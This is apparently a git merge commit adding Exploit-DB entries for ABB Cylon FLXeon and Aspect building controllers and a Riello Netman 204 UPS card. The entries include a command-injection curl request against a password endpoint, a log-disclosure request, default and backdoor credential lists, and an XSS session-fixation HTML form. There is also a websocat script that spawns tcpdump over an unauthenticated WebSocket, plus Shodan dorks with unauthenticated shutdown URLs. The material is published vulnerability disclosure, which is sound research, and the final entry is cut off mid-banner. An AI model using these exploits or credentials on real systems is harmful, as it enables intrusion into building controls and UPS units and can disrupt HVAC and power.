Merge remote-tracking branch 'exploitdb/main'

This commit is contained in:
Brendan McDevitt 2025-04-13 00:01:53 +00:00
commit e763a7dc0b
26 changed files with 1512 additions and 0 deletions

View file

@ -0,0 +1,96 @@
# Exploit Tiltle: ABB Cylon FLXeon 9.3.4 - System Logs Information Disclosure
# Vendor: ABB Ltd.
# Product web page: https://www.global.abb
# Affected version: FLXeon Series (FBXi Series, FBTi Series, FBVi Series)
CBX Series (FLX Series)
CBT Series
CBV Series
Firmware: <=9.3.4
Summary: BACnet® Smart Building Controllers. ABB's BACnet portfolio features a
series of BACnet® IP and BACnet MS/TP field controllers for ASPECT® and INTEGRA™
building management solutions. ABB BACnet controllers are designed for intelligent
control of HVAC equipment such as central plant, boilers, chillers, cooling towers,
heat pump systems, air handling units (constant volume, variable air volume, and
multi-zone), rooftop units, electrical systems such as lighting control, variable
frequency drives and metering.
The FLXeon Controller Series uses BACnet/IP standards to deliver unprecedented
connectivity and open integration for your building automation systems. It's scalable,
and modular, allowing you to control a diverse range of HVAC functions.
Desc: An authenticated attacker can access sensitive information via the system logs
page of ABB Cylon FLXeon controllers. The logs expose critical data, including the
OpenSSL password for stored certificates. This information can be leveraged for further
attacks, such as decrypting encrypted communications, impersonation, or gaining deeper
system access.
Tested on: Linux Kernel 5.4.27
Linux Kernel 4.15.13
NodeJS/8.4.0
Express
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2025-5920
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5920.php
CVE ID: CVE-2024-48852
CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-48852
21.04.2024
--
$ cat project
P R O J E C T
.|
| |
|'| ._____
___ | | |. |' .---"|
_ .-' '-. | | .--'| || | _| |
.-'| _.| | || '-__ | | | || |
|' | |. | || | | | | || |
____| '-' ' "" '-' '-.' '` |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
$ curl -k "https://7.3.3.1/api/cmds" \ # JS > /diagnostics/logs-system (platform-dist)
> -H "Cookie: user_sid=xxx" \
> -d "{\"cmd\":\"journalctl -b -r --no-hostname ^| head -c 600000 \"}"
-- Logs begin at Thu 2024-06-13 10:58:03 EDT, end at Mon 2024-09-09 09:10:33 EDT. --
Feb 13 12:38:26 node[5810]: at endReadableNT (_stream_readable.js:1059:12)
Feb 13 12:38:26 node[5810]: at IncomingMessage.emit (events.js:207:7)
Feb 13 12:38:26 node[5810]: at emitNone (events.js:105:13)
Feb 13 12:38:26 node[5810]: at IncomingMessage.onEnd (/home/MIX_CMIX/node-server/node_modules/raw-body/index.js:273:7)
Feb 13 12:38:26 node[5810]: at done (/home/MIX_CMIX/node-server/node_modules/raw-body/index.js:213:7)
Feb 13 12:38:26 node[5810]: at invokeCallback (/home/MIX_CMIX/node-serve"}
...
...
Sep 09 09:10:33 node[5810]: cmd = openssl req -x509 -passin pass:c*******2 -key /usr/local/aam/node-server//certs/cbxi.key.pem -new -sha256 -out /usr/local/aam/node-server//certs/cbxi.cert.pem -subj "/C=IE/ST=/L=Dublin/O=Cylon Controls/OU=/CN="
Sep 09 09:08:18 node[5810]: cmd = openssl req -x509 -passin pass:c*******2 -key /usr/local/aam/node-server//certs/cbxi.key.pem -new -sha256 -out /usr/local/aam/node-server//certs/cbxi.cert.pem -subj "/C=IE/ST=/L=Dublin/O=Cylon Controls/OU=/CN="
Sep 09 09:00:12 node[5810]: Error: ENOENT: no such file or directory, stat '/usr/local/aam/node-server/certs/cbxi.csr.pem'
Sep 09 08:59:58 node[5810]: Error: ENOENT: no such file or directory, stat '/usr/local/aam/node-server/certs/cbxi.csr.pem'
Sep 09 08:59:41 node[5810]: Error: ENOENT: no such file or directory, stat '/usr/local/
...
...

View file

@ -0,0 +1,79 @@
ABB Cylon FLXeon 9.3.4 Default Credentials
Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: FLXeon Series (FBXi Series, FBTi Series, FBVi Series)
CBX Series (FLX Series)
CBT Series
CBV Series
ABB UC32 Series Main Plant Controllers (Cylon's UnitronUC32.xx)
Firmware: <=9.3.4
Summary: BACnet® Smart Building Controllers. ABB's BACnet portfolio features a
series of BACnet® IP and BACnet MS/TP field controllers for ASPECT® and INTEGRA™
building management solutions. ABB BACnet controllers are designed for intelligent
control of HVAC equipment such as central plant, boilers, chillers, cooling towers,
heat pump systems, air handling units (constant volume, variable air volume, and
multi-zone), rooftop units, electrical systems such as lighting control, variable
frequency drives and metering.
The FLXeon Controller Series uses BACnet/IP standards to deliver unprecedented
connectivity and open integration for your building automation systems. It's scalable,
and modular, allowing you to control a diverse range of HVAC functions.
Desc: The ABB Cylon FLXeon BACnet controller uses a weak set of default administrative
credentials that can be guessed in remote password attacks and gain full control of
the system.
Tested on: Linux Kernel 5.4.27
Linux Kernel 4.15.13
NodeJS/8.4.0
Express
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2025-5919
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5919.php
21.04.2024
--
$ cat project
P R O J E C T
.|
| |
|'| ._____
___ | | |. |' .---"|
_ .-' '-. | | .--'| || | _| |
.-'| _.| | || '-__ | | | || |
|' | |. | || | | | | || |
____| '-' ' "" '-' '-.' '` |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
$ cat cyloncreds.txt
admin:cylonctl
cxpro:siteguide
UC32Net:CylonCtl

View file

@ -0,0 +1,50 @@
# Exploit title: ABB Cylon FLXeon 9.3.4 Limited Cross-Site Request Forgery
# Vendor: ABB Ltd.
# Product web page: https://www.global.abb
# Affected version: FLXeon Series (FBXi Series, FBTi Series, FBVi Series)
CBX Series (FLX Series)
CBT Series
CBV Series
Firmware: <=9.3.4
Summary: BACnet® Smart Building Controllers. ABB's BACnet portfolio features a
series of BACnet® IP and BACnet MS/TP field controllers for ASPECT® and INTEGRA™
building management solutions. ABB BACnet controllers are designed for intelligent
control of HVAC equipment such as central plant, boilers, chillers, cooling towers,
heat pump systems, air handling units (constant volume, variable air volume, and
multi-zone), rooftop units, electrical systems such as lighting control, variable
frequency drives and metering.
The FLXeon Controller Series uses BACnet/IP standards to deliver unprecedented
connectivity and open integration for your building automation systems. It's scalable,
and modular, allowing you to control a diverse range of HVAC functions.
Desc: A CSRF vulnerability has been identified in the ABB Cylon FLXeon series. However,
exploitation is limited to specific conditions due to the server's CORS configuration
(Access-Control-Allow-Origin: * without Access-Control-Allow-Credentials: true). The
vulnerability can only be exploited under the following scenarios:
Same Domain: The attacker must host the malicious page on the same domain as the
target server.
Man-in-the-Middle (MitM): The attacker can intercept and modify traffic between
the user and the server (e.g., on an unsecured network).
Local Area Network (LAN) Access: The attacker must have access to the same network
as the target server.
Subdomains: The attacker can host the malicious page on a subdomain if the server
allows it.
Misconfigured CORS: The servers CORS policy is misconfigured to allow certain
origins or headers.
Reflected XSS: The attacker can exploit a reflected XSS vulnerability to execute
JavaScript in the context of the target origin.
Tested on: Linux Kernel 5.4.27
Linux Kernel 4.15.13
NodeJS/8.4.0
Express
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2025-5918
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5918.php

View file

@ -0,0 +1,81 @@
# Exploit title: ABB Cylon Aspect 3.08.02 PHP Session Fixation Vulnerability
# Advisory ID: ZSL-2025-5916
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5916.php
# CVE ID: CVE-2024-11317
# CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-11317
Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: <=3.08.02
Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.
Desc: The ABB Cylon Aspect BMS/BAS controller is vulnerable to session
fixation, allowing an attacker to set a predefined PHPSESSID value. An
attacker can leverage an unauthenticated reflected XSS vulnerability in
jsonProxy.php to inject a crafted request, forcing the victim to adopt
a fixated session.
Tested on: GNU/Linux 3.15.10 (armv7l)
GNU/Linux 3.10.0 (x86_64)
GNU/Linux 2.6.32 (x86_64)
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
PHP/7.3.11
PHP/5.6.30
PHP/5.4.16
PHP/4.4.8
PHP/5.3.3
AspectFT Automation Application Server
lighttpd/1.4.32
lighttpd/1.4.18
Apache/2.2.15 (CentOS)
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
ErgoTech MIX Deployment Server 2.0.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
P R O J E C T
.|
| |
|'| ._____
___ | | |. |' .---"|
_ .-' '-. | | .--'| || | _| |
.-'| _.| | || '-__ | | | || |
|' | |. | || | | | | || |
____| '-' ' "" '-' '-.' '` |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
<body>
<!-- Session ID in a cookie (Client-side script) OWASP Ref.: -->
<form action="http://192.168.73.31/jsonProxy.php" method="GET">
<input type="hidden" name="application" value="zeroscience" />
<input type="hidden" name="query" value="<script>document.cookie="PHPSESSID=22222222225555555555111111; path=/"%0A%0Dwindow.location.href="/"</script>" />
<input type="submit" value="Fix!" />
</form>
</body>
</html>

View file

@ -0,0 +1,70 @@
# Exploit Title: Netman 204 - Remote command with out authentication
# Date: 2/4/2025
# Exploit Author: parsa rezaie khiabanloo
# Vendor Homepage: netman-204 (https://www.riello-ups.com/downloads/25-netman-204)
# Version: netman-204
# Tested on: Windows/Linux
Step 1 : Attacker can using these dorks then can find the UPS panel .
Shodan : http.favicon.hash:22913038 OR https://www.shodan.io/search?query=netman+204+cgi-bin
# We Found Two panel Yellow and blue
Step 2 : For Yellow panel attacker can use these username and password because there have backdoor and for Blue panel we can use the Remote commands and burpsuite repeater to see the details of the ups .
Yellow Panel : username and password : eurek
Some exploits for that :
http://[IP]/cgi-bin/login.cgi?username=eurek&password=eurek
or
https://[IP]/cgi-bin/login.cgi?username=eurek&password=eurek
Due to flaws in parameter validation, the URL can be shortened to:
http://[IP]/cgi-bin/login.cgi?username=eurek%20eurek
or
https://[IP]/cgi-bin/login.cgi?username=eurek%20eurek
Blue Panel : username and password : admin
Some Critical leaks without authentication we can see :
http://IP/administration-commands.html
http://IP/administration.html
http://IP/administration.html#
http://IP/administration.html#LDAP
http://IP/administration.html#active-users
http://IP/administration.html#firmware-upgrade
http://IP/configuration.html
http://IP/history.html
http://IP/index.html
http://IP/login.html
http://IP/system-overview.html
http://IP/table.html
#With using up paths we can see the details of the UPS without authentication .
First open burpsuite and intercept the requests then use the up paths and after that send that request to the repeater then send it again and in your response open the render and enjoy :)
Some Remote commands without authentication :
http://IP/administration-commands.html
http://IP/administration-commands.html#
http://IP/administration-commands.html#reboot-irms
http://IP/administration-commands.html#reboot-mdu
http://IP/administration-commands.html#reboot-xts
http://IP/administration-commands.html#shutdown
http://IP/administration-commands.html#shutdown-irms
http://IP/administration-commands.html#shutdown-mdu
http://IP/administration-commands.html#shutdown-restore
http://IP/administration-commands.html#shutdown-restore-irms
http://IP/administration-commands.html#shutdown-restore-mdu
http://IP/administration-commands.html#shutdown-restore-xts
http://IP/administration-commands.html#shutdown-xts
http://IP/administration-commands.html#shutdownrestore
http://IP/administration-commands.html#switch-irms
http://IP/administration-commands.html#switch-on-bypass
http://IP/administration-commands.html#test-battery

View file

@ -0,0 +1,131 @@
# ABB Cylon FLXeon 9.3.4 (wsConnect.js) WebSocket Command Spawning PoC
# Vendor: ABB Ltd.
# Product web page: https://www.global.abb
# Affected version: FLXeon Series (FBXi Series, FBTi Series, FBVi Series)
CBX Series (FLX Series)
CBT Series
CBV Series
Firmware: <=9.3.4
# Advisory ID: ZSL-2025-5913
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5913.php
# CVE ID: CVE-2024-48849
# CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-48849
Summary: BACnet® Smart Building Controllers. ABB's BACnet portfolio features a
series of BACnet® IP and BACnet MS/TP field controllers for ASPECT® and INTEGRA™
building management solutions. ABB BACnet controllers are designed for intelligent
control of HVAC equipment such as central plant, boilers, chillers, cooling towers,
heat pump systems, air handling units (constant volume, variable air volume, and
multi-zone), rooftop units, electrical systems such as lighting control, variable
frequency drives and metering.
The FLXeon Controller Series uses BACnet/IP standards to deliver unprecedented
connectivity and open integration for your building automation systems. It's scalable,
and modular, allowing you to control a diverse range of HVAC functions.
Desc: The ABB Cylon FLXeon BACnet controller is vulnerable to an unauthenticated
WebSocket implementation that allows an attacker to execute the tcpdump command.
This command captures network traffic and filters it on serial ports 4855 and 4851,
which are relevant to the device's services. The vulnerability can be exploited in
a loop to start multiple instances of tcpdump, leading to resource exhaustion, denial
of service (DoS) conditions, and potential data exfiltration. The lack of authentication
on the WebSocket interface allows unauthorized users to continuously spawn new tcpdump
processes, amplifying the attack's impact.
Tested on: Linux Kernel 5.4.27
Linux Kernel 4.15.13
NodeJS/8.4.0
Express
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
21.04.2024
EOC
cat << "EOF"
P R O J E C T
.|
| |
|'| ._____
___ | | |. |' .---"|
_ .-' '-. | | .--'| || | _| |
.-'| _.| | || '-__ | | | || |
|' | |. | || | | | | || |
____| '-' ' "" '-' '-.' '` |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
EOF
echo -ne "\n-------------------------------------------------------"
echo -ne "\nABB Cylon BACnet Building Controllers WebSocket Exploit"
echo -ne "\n-------------------------------------------------------\n"
if [ "$#" -ne 1 ]; then
echo -ne "\nUsage: $0 [ipaddr]\n\n"
exit
fi
IP=$1
TARGET="wss://$IP:443/ws"
PID=$!
echo "$PID"
STOP_SERVICE=`echo -e \
"\x7B\x22\x74\x61\x72\x67\x65\x74\x22\x3A\x22\x74\x63"\
"\x70\x64\x75\x6D\x70\x22\x2C\x22\x6D\x65\x74\x68\x6F"\
"\x64\x22\x3A\x22\x73\x74\x6F\x70\x22\x2C\x22\x70\x61"\
"\x72\x61\x6D\x73\x22\x3A\x7B\x22\x74\x79\x70\x65\x22"\
"\x3A\x22\x73\x6D\x61\x72\x74\x52\x6F\x75\x74\x65\x72"\
"\x22\x2C\x22\x6D\x69\x6E\x75\x74\x65\x73\x22\x3A\x31"\
"\x2C\x22\x73\x69\x7A\x65\x4B\x62\x22\x3A\x31\x30\x7D"\
"\x7D"` #stop tcpdump smartRouter capture
START_SERVICE=`echo -e \
"\x7B\x22\x74\x61\x72\x67\x65\x74\x22\x3A\x22\x74\x63"\
"\x70\x64\x75\x6D\x70\x22\x2C\x22\x6D\x65\x74\x68\x6F"\
"\x64\x22\x3A\x22\x73\x74\x61\x72\x74\x22\x2C\x22\x70"\
"\x61\x72\x61\x6D\x73\x22\x3A\x7B\x22\x74\x79\x70\x65"\
"\x22\x3A\x22\x73\x6D\x61\x72\x74\x52\x6F\x75\x74\x65"\
"\x72\x22\x2C\x22\x6D\x69\x6E\x75\x74\x65\x73\x22\x3A"\
"\x31\x2C\x22\x73\x69\x7A\x65\x4B\x62\x22\x3A\x31\x30"\
"\x7D\x7D"` #start tcpdump smartRouter capture
echo -e "\n[+] Sending JSONRPC => $START_SERVICE\n"
sleep 1
echo "$START_SERVICE"|
websocat --insecure --one-message --buffer-size 251 --no-close "$TARGET" -v
sleep 2
echo -e "\n[+] Sending JSONRPC => $STOP_SERVICE\n"
sleep 1
echo "$STOP_SERVICE"|
websocat -k -1 -B 251 -n "$TARGET" -v
echo -e "\n[*] Done"
<< "LOG"
$ cd /usr/local/aam/var; journalctl -r --no-hostname --no-pager >log.txt; split -n 4 log.txt
$ cat /usr/local/aam/var/xaa
$ cat /usr/local/aam/var/xab
$ cat /usr/local/aam/var/xac
$ cat /usr/local/aam/var/xad
...
#Apr 21 23:12:51 kernel: device lo left promiscuous mode
#Apr 21 23:12:34 kernel: device lo entered promiscuous mode
#Apr 21 23:12:34 node[196]: ws connect
...
LOG

View file

@ -0,0 +1,81 @@
# Exploit title: ABB Cylon FLXeon 9.3.4 - Remote Code Execution (RCE)
# Vendor: ABB Ltd.
# Product web page: https://www.global.abb
# Affected version: FLXeon Series (FBXi Series, FBTi Series, FBVi Series)
CBX Series (FLX Series)
CBT Series
CBV Series
Firmware: <=9.3.4
Summary: BACnet® Smart Building Controllers. ABB's BACnet portfolio features a
series of BACnet® IP and BACnet MS/TP field controllers for ASPECT® and INTEGRA™
building management solutions. ABB BACnet controllers are designed for intelligent
control of HVAC equipment such as central plant, boilers, chillers, cooling towers,
heat pump systems, air handling units (constant volume, variable air volume, and
multi-zone), rooftop units, electrical systems such as lighting control, variable
frequency drives and metering.
The FLXeon Controller Series uses BACnet/IP standards to deliver unprecedented
connectivity and open integration for your building automation systems. It's scalable,
and modular, allowing you to control a diverse range of HVAC functions.
Desc: The ABB Cylon FLXeon BACnet controller is vulnerable to authenticated remote
root code execution via the /api/users/password endpoint. An attacker with valid
credentials can inject arbitrary system commands by manipulating the newPassword PUT
parameter. The issue arises in users.js, where the new password is hashed and improperly
escaped before being passed to ChildProcess.exec() within a usermod command, allowing
out of band (blind) command injection.
Tested on: Linux Kernel 5.4.27
Linux Kernel 4.15.13
NodeJS/8.4.0
Express
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2025-5912
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5912.php
CVE ID: CVE-2024-48841
CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-48841
21.04.2024
--
$ cat project
P R O J E C T
.|
| |
|'| ._____
___ | | |. |' .---"|
_ .-' '-. | | .--'| || | _| |
.-'| _.| | || '-__ | | | || |
|' | |. | || | | | | || |
____| '-' ' "" '-' '-.' '` |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
$ curl -k -X PUT "https://7.3.3.1/api/users/password" \
> -H "Cookie: user_sid=xxx" \
> -H "Content-Type: application/json" \
> --data '{"oldPassword":"KAKA","newPassword":"ZULU`sleep 7`"}'

View file

@ -0,0 +1,92 @@
# Exploit Title: ABB Cylon FLXeon 9.3.4 - Remote Code Execution (Authenticated)
# Vendor: ABB Ltd.
# Product web page: https://www.global.abb
# Affected version: FLXeon Series (FBXi Series, FBTi Series, FBVi Series)
CBX Series (FLX Series)
CBT Series
CBV Series
Firmware: <=9.3.4
Summary: BACnet® Smart Building Controllers. ABB's BACnet portfolio features a
series of BACnet® IP and BACnet MS/TP field controllers for ASPECT® and INTEGRA™
building management solutions. ABB BACnet controllers are designed for intelligent
control of HVAC equipment such as central plant, boilers, chillers, cooling towers,
heat pump systems, air handling units (constant volume, variable air volume, and
multi-zone), rooftop units, electrical systems such as lighting control, variable
frequency drives and metering.
The FLXeon Controller Series uses BACnet/IP standards to deliver unprecedented
connectivity and open integration for your building automation systems. It's scalable,
and modular, allowing you to control a diverse range of HVAC functions.
Desc: The ABB Cylon FLXeon BACnet controller is vulnerable to authenticated remote root
code execution via the /api/timeConfig endpoint. An attacker with valid credentials
can inject arbitrary system commands by manipulating parameters such as tz, timeServerYN,
and multiple timeDate fields. The vulnerability exists due to improper input validation
in timeConfig.js, where user-supplied data is executed via ChildProcess.exec() without
adequate sanitization.
Tested on: Linux Kernel 5.4.27
Linux Kernel 4.15.13
NodeJS/8.4.0
Express
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2025-5910
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5910.php
CVE ID: CVE-2024-48841
CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-48841
21.04.2024
--
$ cat project
P R O J E C T
.|
| |
|'| ._____
___ | | |. |' .---"|
_ .-' '-. | | .--'| || | _| |
.-'| _.| | || '-__ | | | || |
|' | |. | || | | | | || |
____| '-' ' "" '-' '-.' '` |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
